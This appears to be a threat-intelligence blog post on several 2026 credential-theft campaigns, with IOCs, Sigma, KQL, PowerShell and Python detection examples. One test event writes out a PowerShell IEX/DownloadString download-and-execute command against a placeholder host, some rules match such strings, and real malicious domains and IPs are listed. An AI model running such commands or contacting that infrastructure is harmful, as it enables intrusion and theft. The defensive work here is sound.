
TwizAdmin, Ghost Stadium & Laravel Supply Chain: Multi-Vector Credential Theft Ecosystem — OTX Pulse Analysis

Security Arsenal Team
May 27, 2026

Recent OTX pulses indicate a surge in diverse credential theft tactics ranging from sophisticated multi-platform malware to supply chain compromises. The TwizAdmin operation is utilizing a novel FastAPI C2 panel to manage cross-platform crypto-clipping and credential theft. Simultaneously, the GHOST STADIUM campaign is leveraging global events (FIFA 2026) to distribute Vidar and Lumma stealers via massive phishing infrastructure. Separately, a critical supply chain attack on Laravel Lang packages and the ClearFake use of blockchain smart contracts for C2 highlight the evolving obfuscation techniques used by adversaries to harvest sensitive data and maintain persistence.

Threat Actor / Malware Profile

| Campaign | Actor | Malware/Tools | Distribution | Behavior |
|---|---|---|---|---|
| TwizAdmin | DataBreachPlus | TwizAdmin, crpx0 Ransomware, Java RAT | FedEx-themed lures, multi-platform (Win/macOS) | Clipboard hijacking (8 chains), BIP-39 phrase theft, browser credential exfiltration, FastAPI C2 |
| GHOST STADIUM | GHOST STADIUM | Vidar, Lumma | Facebook Ads, Phishing-as-a-Service (300+ domains) | FIFA World Cup ticket fraud, credential harvesting, pixel-perfect clones of authentication pages |
| ClearFake | Unknown | SectopRAT, ACRStealer | Compromised sites (Swiss focus), injected JS | "EtherHiding" technique using BNB Smart Chain testnet for immutable C2 instructions |
| Laravel Compromise | Unknown | helpers.php backdoor, DebugChromium.exe | Supply chain (Composer packages) | RCE via malicious package tags, payload delivery from flipboxstudio.info |
| Cloud Atlas | Inception Framework | PowerCloud, VBCloud, ValleyRAT | Phishing (ZIP/LNK) | Targeting government entities in Russia/Belarus, network reconnaissance, file theft |

IOC Analysis

The provided pulses present a high volume of actionable indicators spanning multiple infrastructure types:

  • Domains & URLs: Over 60 fraudulent domains related to FIFA (e.g., fifa.gold, fifa.black) and malicious infrastructure for TwizAdmin (fanonlyatn.xyz) and ClearFake (.cfd, .lat TLDs). These should be immediately sinkholed or blocked at the DNS layer.
  • IP Addresses: Specific C2 IPs such as 103.241.66[.]238 (TwizAdmin) and 148.178.22[.]16 (Ghost Stadium) provide direct, network-level blockable artifacts.
  • File Hashes: Multiple SHA256 hashes for the TwizAdmin payloads (e.g., 0629967...) and the specific Laravel payload DebugChromium.exe allow for exact-match scanning on endpoints.
  • Operationalization: SOC teams should ingest these IOCs into EDR and SIEM platforms. Domains like fifa.gold serve as high-fidelity triggers for phishing alerts. The .cfd and .lat TLDs, while less common, are heavily utilized in the ClearFake campaign for C2 traffic and should be scrutinized if not outright blocked.
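The normalisation step that the operationalisation bullet implies is easy to get wrong (defanged `[.]` notation, subdomains of a listed domain, bare TLD heuristics), so here is an added example, not code from the Security Arsenal post, that refangs the indicators quoted above and runs them over constructed DNS/proxy log lines. The domains and IPs come from the post; the log format, the host names and the log lines themselves are constructed for illustration.

```python
"""Added example (not from the original post): normalise the quoted IOCs and
match them against constructed DNS/proxy log lines."""
import re
from ipaddress import ip_address

# Indicators as quoted in the post, defanged form preserved where the post uses it
RAW_DOMAINS = ["fifa.gold", "fifa.black", "fanonlyatn.xyz", "flipboxstudio.info"]
RAW_IPS = ["103.241.66[.]238", "148.178.22.16"]
# TLDs the post says ClearFake C2 traffic relies on; treated as a weaker signal
SUSPECT_TLDS = (".cfd", ".lat")


def refang(value: str) -> str:
    """Turn defanged notation ('[.]', 'hxxp') back into a matchable string."""
    return value.strip().lower().replace("[.]", ".").replace("hxxp", "http")


def build_iocs(domains, ips):
    """Return (domain set, IP set); ip_address() rejects anything malformed."""
    domain_set = {refang(d) for d in domains}
    ip_set = {str(ip_address(refang(i))) for i in ips}
    return domain_set, ip_set


# Constructed log format: "<timestamp> <host> <dns|proxy> <destination>"
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<kind>dns|proxy) (?P<dst>\S+)$")


def classify(line, domains, ips):
    """Return a verdict for one log line, or None when nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return None
    dst = m.group("dst").lower()
    if dst in ips:
        return "c2-ip"
    # exact listed domain, or any subdomain of it (tickets.fifa.gold)
    if dst in domains or any(dst.endswith("." + d) for d in domains):
        return "ioc-domain"
    if dst.endswith(SUSPECT_TLDS):
        return "suspect-tld"
    return None


def scan(lines, domains, ips):
    """Return (verdict, line) pairs for every line that matched."""
    hits = []
    for line in lines:
        verdict = classify(line, domains, ips)
        if verdict:
            hits.append((verdict, line))
    return hits


# Constructed sample log lines (host names and timestamps are invented)
SAMPLE_LOG = [
    "2026-05-27T10:00:01Z ws-042 dns fifa.gold",
    "2026-05-27T10:00:05Z ws-042 dns tickets.fifa.gold",
    "2026-05-27T10:01:10Z ws-017 proxy 103.241.66.238",
    "2026-05-27T10:02:00Z ws-017 dns afraid.veloitall.cfd",
    "2026-05-27T10:03:00Z ws-099 dns www.example.com",
    "2026-05-27T10:04:00Z ws-099 dns fifa.com",
]

if __name__ == "__main__":
    doms, addrs = build_iocs(RAW_DOMAINS, RAW_IPS)
    for verdict, line in scan(SAMPLE_LOG, doms, addrs):
        print(f"{verdict:12} {line}")
```

The exact-domain and C2-IP matches are high fidelity and can page an analyst directly; the TLD match is only a triage signal and should land in a review queue, which is why `classify` reports the three outcomes separately rather than as one boolean.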

Detection Engineering

Sigma Rules

```yaml
title: Potential TwizAdmin or ClearFake C2 Traffic via Suspicious TLDs
id: 6a4b5c12-8d9e-4f5a-9b2c-1d3e4f5a6b7c
description: Detects outbound network connections to TLDs (.xyz, .cfd, .lat) associated with TwizAdmin C2 and ClearFake EtherHiding campaigns.
status: experimental
date: 2026/05/28
author: Security Arsenal
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Initiated: 'true'
        # endswith rather than contains, so a host such as corp.xyz.example.com does not fire
        DestinationHostname|endswith:
            - '.xyz'
            - '.cfd'
            - '.lat'
            - '.top'
    condition: selection
falsepositives:
    - Legitimate software using uncommon TLDs
level: medium
tags:
    - attack.command_and_control
    - attack.t1071.001
---
title: Laravel Backdoor Payload Execution
id: b2c3d4e5-6f7a-8b9c-0d1e-2f3a4b5c6d7e
description: Detects execution of DebugChromium.exe, a specific payload associated with the Laravel Lang supply chain compromise, or a command line referencing its delivery host.
status: experimental
date: 2026/05/28
author: Security Arsenal
logsource:
    category: process_creation
    product: windows
detection:
    # Either indicator on its own is sufficient; the payload's own command line
    # will not normally contain the delivery domain, so the two are OR'd.
    selection_image:
        Image|endswith: '\DebugChromium.exe'
    selection_cmdline:
        CommandLine|contains: 'flipboxstudio.info'
    condition: 1 of selection_*
falsepositives:
    - Unlikely, specific to malware campaign
level: critical
tags:
    - attack.initial_access
    - attack.t1195.002
---
title: Ghost Stadium Phishing Loader Activity
id: c3d4e5f6-7a8b-9c0d-1e2f-3a4b5c6d7e8f
description: Detects behavior consistent with Vidar/Lumma loaders often used in GHOST STADIUM campaigns, involving mshta.exe or wscript.exe launching powershell.exe or cmd.exe with a download-and-execute command line.
status: experimental
date: 2026/05/28
author: Security Arsenal
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith:
            - '\mshta.exe'
            - '\wscript.exe'
        Image|endswith:
            - '\powershell.exe'
            - '\cmd.exe'
        # Sigma string matching is case-insensitive, so 'DownloadString' and 'IEX' are covered
        CommandLine|contains:
            - 'downloadstring'
            - 'iex'
    condition: selection
falsepositives:
    - Legitimate system administration scripts
level: high
tags:
    - attack.execution
    - attack.t1059.001
```
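Before shipping a rule like the Ghost Stadium loader rule above it is worth checking its logic against a handful of events by hand. The following is an added example, not part of the post or of the Sigma project: a minimal evaluator that applies that rule's detection block with Sigma semantics (values in a list are OR'd, fields within a selection are AND'd, string comparison is case-insensitive) to constructed process-creation events. It implements only the modifiers the rules on this page use (`endswith`, `contains`, exact match) and `or`-style conditions; the events, paths and the `placeholder.invalid` host are constructed.

```python
"""Added example (not from the original post): evaluate a Sigma-style
detection block against constructed process-creation events."""

# Mirrors the detection block of the Ghost Stadium rule above
DETECTION = {
    "selection": {
        "ParentImage|endswith": ["\\mshta.exe", "\\wscript.exe"],
        "Image|endswith": ["\\powershell.exe", "\\cmd.exe"],
        "CommandLine|contains": ["downloadstring", "iex"],
    },
    "condition": "selection",
}


def _match_value(modifier, actual, expected):
    """Compare one field value with one expected value, case-insensitively."""
    a, e = actual.lower(), expected.lower()
    if modifier == "endswith":
        return a.endswith(e)
    if modifier == "contains":
        return e in a
    if modifier is None:
        return a == e
    raise ValueError(f"unsupported modifier: {modifier}")


def _match_field(spec, event, expected):
    """'Field|modifier' against an event; a list of values is OR'd."""
    field, _, modifier = spec.partition("|")
    actual = event.get(field)
    if actual is None:
        return False
    values = expected if isinstance(expected, list) else [expected]
    return any(_match_value(modifier or None, str(actual), str(v)) for v in values)


def matches(detection, event):
    """True when the event satisfies the condition (supports 'a or b' style)."""
    names = [n.strip() for n in detection["condition"].split(" or ")]
    return any(
        all(_match_field(spec, event, exp) for spec, exp in detection[name].items())
        for name in names
    )


def run(events, detection=DETECTION):
    """Indices of the events that fire the rule."""
    return [i for i, ev in enumerate(events) if matches(detection, ev)]


# Constructed events; the download host is a deliberate placeholder
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
EVENTS = [
    {"ParentImage": "C:\\Windows\\System32\\mshta.exe", "Image": PS,
     "CommandLine": "powershell -nop -c IEX ((New-Object Net.WebClient).DownloadString('http://placeholder.invalid/a'))"},
    {"ParentImage": "C:\\Windows\\explorer.exe", "Image": PS,
     "CommandLine": "powershell -c iex 'Get-Date'"},          # parent not in scope
    {"ParentImage": "C:\\Windows\\System32\\wscript.exe", "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd /c dir"},                             # benign command line
    {"ParentImage": "C:\\Windows\\System32\\wscript.exe", "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd /c powershell -c iex $env:PAYLOAD"},  # fires on 'iex'
]

if __name__ == "__main__":
    print("matching events:", run(EVENTS))
```

Event 1 shows why the rule carries a `ParentImage` clause: an interactive `iex` under explorer.exe is the administrator-script false positive the rule's own `falsepositives` entry describes, and it is excluded by the parent-process requirement rather than by weakening the command-line match.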

KQL (Microsoft Sentinel / Defender)

```kql
// Hunt for Ghost Stadium, TwizAdmin and Laravel network indicators
let IoC_Domains = dynamic([
    "fanonlyatn.xyz",
    "fifa.gold", "fifa.black", "fifa.tax", "fifaweb.com", "fifa.red", "fifa.fund", "fifa-com.shop",
    "afraid.veloitall.cfd", "root-cul.xamir3on.lat", "flipboxstudio.info"
]);
DeviceNetworkEvents
| where RemoteUrl in~ (IoC_Domains)
    // Broaden for ClearFake infrastructure: anchor on the TLD itself (optionally followed
    // by a port or path) instead of the loose term match that has_any would perform
    or RemoteUrl matches regex @"\.(cfd|lat)(:\d+)?(/|$)"
// bin() belongs in the by-clause; assigning it as an aggregate is a syntax error
| summarize Count = count()
    by DeviceName, RemoteUrl, InitiatingProcessFileName, TimeBucket = bin(TimeGenerated, 1h)
| order by Count desc
```

PowerShell Hunt Script

```powershell
<#
.SYNOPSIS
    IOC Scanner for TwizAdmin Hashes and Laravel Payloads
.DESCRIPTION
    Scans specific paths and running processes for SHA256 hashes associated with the TwizAdmin campaign
    and the Laravel Lang backdoor payload, then checks the hosts file for the campaign domains.
#>

# SHA256 hashes of TwizAdmin payloads (lowercase, compared against lowercased Get-FileHash output)
$TwizHashes = @(
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092",
    "3fcd267e811d9b83cafa3d8d6932fa1c56f4fd8dcf46f9ec346e0689439532d4",
    "584796212f99efc7ac765d6048913fe34e46a64b13a8a78fb3a465b8c61f3527",
    "74ab520e94b2f3b8915ec7b47abab7a2d7e9759add5aa195af7edf0ffa5b4150",
    "9d9783f57fd543043e0792d125831883259c823a5eaa69211e5254db4db4eaec"
)

Write-Host "[+] Checking for DebugChromium.exe (Laravel Payload)..."
$PathsToScan = @("C:\Users\", "C:\ProgramData\", "C:\Windows\Temp")
foreach ($path in $PathsToScan) {
    Get-ChildItem -Path $path -Recurse -File -ErrorAction SilentlyContinue -Filter "DebugChromium.exe" | ForEach-Object {
        Write-Host "[!] Suspicious file found: $($_.FullName)" -ForegroundColor Red
    }
}

Write-Host "[+] Scanning for TwizAdmin Hashes in User Directories..."
# -File avoids handing directories to Get-FileHash; -Include only applies together with -Recurse
Get-ChildItem -Path "C:\Users\" -Recurse -File -Include *.exe, *.dll, *.zip -ErrorAction SilentlyContinue | ForEach-Object {
    $hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
    if ($hash -and $TwizHashes -contains $hash.ToLower()) {
        Write-Host "[!] TwizAdmin Malware Found: $($_.FullName)" -ForegroundColor Red
    }
}

Write-Host "[+] Hashing executables of running processes..."
# A payload that has already been launched and deleted from disk still shows its image path here
Get-Process -ErrorAction SilentlyContinue | Where-Object { $_.Path } | Select-Object -ExpandProperty Path -Unique | ForEach-Object {
    if ((Split-Path $_ -Leaf) -ieq "DebugChromium.exe") {
        Write-Host "[!] DebugChromium.exe is running from: $_" -ForegroundColor Red
    }
    $hash = (Get-FileHash -Path $_ -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
    if ($hash -and $TwizHashes -contains $hash.ToLower()) {
        Write-Host "[!] Running process matches TwizAdmin hash: $_" -ForegroundColor Red
    }
}

Write-Host "[+] Checking Hosts file for malicious domains..."
$HostsContent = Get-Content -Path "$env:SystemRoot\System32\drivers\etc\hosts"
$MaliciousDomains = @("fanonlyatn.xyz", "fifa.gold", "flipboxstudio.info")
foreach ($line in $HostsContent) {
    foreach ($dom in $MaliciousDomains) {
        if ($line -like "*$dom*") {
            Write-Host "[!] Malicious entry in hosts file: $line" -ForegroundColor Yellow
        }
    }
}
```


Response Priorities

*   **Immediate**:
    *   Block all domains listed in the IOC Analysis at the perimeter and DNS forwarders.
    *   Scan endpoints for the SHA256 hashes associated with **TwizAdmin** and the file name `DebugChromium.exe`.
    *   Block network access to `103.241.66[.]238` and `148.178.22.16`.
*   **24 Hours**:
    *   Identify and isolate machines that have contacted the identified GHOST STADIUM phishing domains (potential credential compromise).
    *   Conduct a supply chain audit on systems using **Laravel**, specifically checking `laravel-lang` packages for malicious versions (May 22-23, 2026 tags).
    *   Force reset credentials for developer accounts with access to CI/CD pipelines, given the Laravel compromise nature.
*   **1 Week**:
    *   Implement browser security policies to restrict clipboard access (mitigation for crypto-clippers).
    *   Review and restrict the use of `.cfd`, `.lat`, and `.xyz` TLDs for non-business critical traffic.
    *   Harden developer workstations against dependency confusion attacks.
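The 24-hour item about auditing `laravel-lang` packages is the one responders most often need to script across many repositories. Here is an added example, not code from the post or from the Laravel Lang project, that reads a `composer.lock`, lists every `laravel-lang/*` package with its version and source reference, flags those whose release time falls in the May 22-23, 2026 window the post names, and separately checks `helpers.php` files under `vendor/laravel-lang/` for the `flipboxstudio.info` delivery host the post attributes to the backdoor. The lock excerpt, the version strings, the commit references and the file contents are all constructed placeholders; the real malicious tags must be taken from the upstream advisory.

```python
"""Added example (not from the original post): audit composer.lock and vendor
helpers.php files for the laravel-lang supply chain compromise."""
import json
from datetime import datetime, timezone

# Window the post gives for the malicious laravel-lang tags (May 22-23, 2026)
WINDOW_START = datetime(2026, 5, 22, tzinfo=timezone.utc)
WINDOW_END = datetime(2026, 5, 24, tzinfo=timezone.utc)  # exclusive
VENDOR_PREFIX = "laravel-lang/"
# Payload host the post attributes to the helpers.php backdoor
BACKDOOR_MARKER = "flipboxstudio.info"

# Constructed composer.lock excerpt; versions, times and references are placeholders
SAMPLE_LOCK = json.dumps({
    "packages": [
        {"name": "laravel-lang/lang", "version": "v99.9.9-placeholder",
         "time": "2026-05-22T18:42:11+00:00", "source": {"reference": "0000000placeholder"}},
        {"name": "laravel-lang/common", "version": "v1.0.0-placeholder",
         "time": "2026-04-02T09:00:00+00:00", "source": {"reference": "1111111placeholder"}},
        {"name": "laravel/framework", "version": "v11.0.0-placeholder",
         "time": "2026-05-23T10:00:00+00:00", "source": {"reference": "2222222placeholder"}},
    ],
    "packages-dev": [
        {"name": "laravel-lang/publisher", "version": "v2.0.0-placeholder",
         "time": "2026-05-23T23:59:59+00:00", "source": {"reference": "3333333placeholder"}},
    ],
})


def parse_time(value):
    """composer.lock 'time' is ISO 8601 with an offset; normalise to UTC."""
    return datetime.fromisoformat(value).astimezone(timezone.utc)


def audit_lock(lock_text):
    """One finding per laravel-lang package, with in_window set for the suspect dates."""
    lock = json.loads(lock_text)
    findings = []
    for section in ("packages", "packages-dev"):
        for pkg in lock.get(section, []):
            name = pkg.get("name", "")
            if not name.startswith(VENDOR_PREFIX):
                continue
            released = parse_time(pkg["time"]) if pkg.get("time") else None
            findings.append({
                "name": name,
                "version": pkg.get("version"),
                "section": section,
                "reference": pkg.get("source", {}).get("reference"),
                "released": pkg.get("time"),
                "in_window": released is not None and WINDOW_START <= released < WINDOW_END,
            })
    return findings


def flagged(lock_text):
    """Sorted names of laravel-lang packages released inside the suspect window."""
    return sorted(f["name"] for f in audit_lock(lock_text) if f["in_window"])


def suspicious_helpers(files):
    """files maps a vendor-relative path to its content (read from disk in practice).
    Returns helpers.php paths under vendor/laravel-lang/ that reference the payload host."""
    return sorted(
        path for path, content in files.items()
        if path.replace("\\", "/").startswith("vendor/laravel-lang/")
        and path.endswith("helpers.php")
        and BACKDOOR_MARKER in content
    )


# Constructed vendor tree; the first file only contains a placeholder reference to the host
SAMPLE_FILES = {
    "vendor/laravel-lang/lang/src/helpers.php": "<?php // placeholder: 'https://flipboxstudio.info/placeholder'",
    "vendor/laravel-lang/common/src/helpers.php": "<?php function lang_path() { return __DIR__; }",
    "vendor/other/pkg/helpers.php": "<?php // flipboxstudio.info mentioned outside laravel-lang",
}

if __name__ == "__main__":
    for f in audit_lock(SAMPLE_LOCK):
        print(("REVIEW " if f["in_window"] else "ok     ") + f"{f['name']} {f['version']} {f['reference']}")
    print("suspicious helpers:", suspicious_helpers(SAMPLE_FILES))
```

Run the lock audit against every repository's committed `composer.lock`, not only the deployed host: the lock file records the exact tag and commit reference that was installed, which is what needs to be compared with the upstream advisory, while the `helpers.php` check covers hosts where the vendor tree was updated without the lock being committed.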
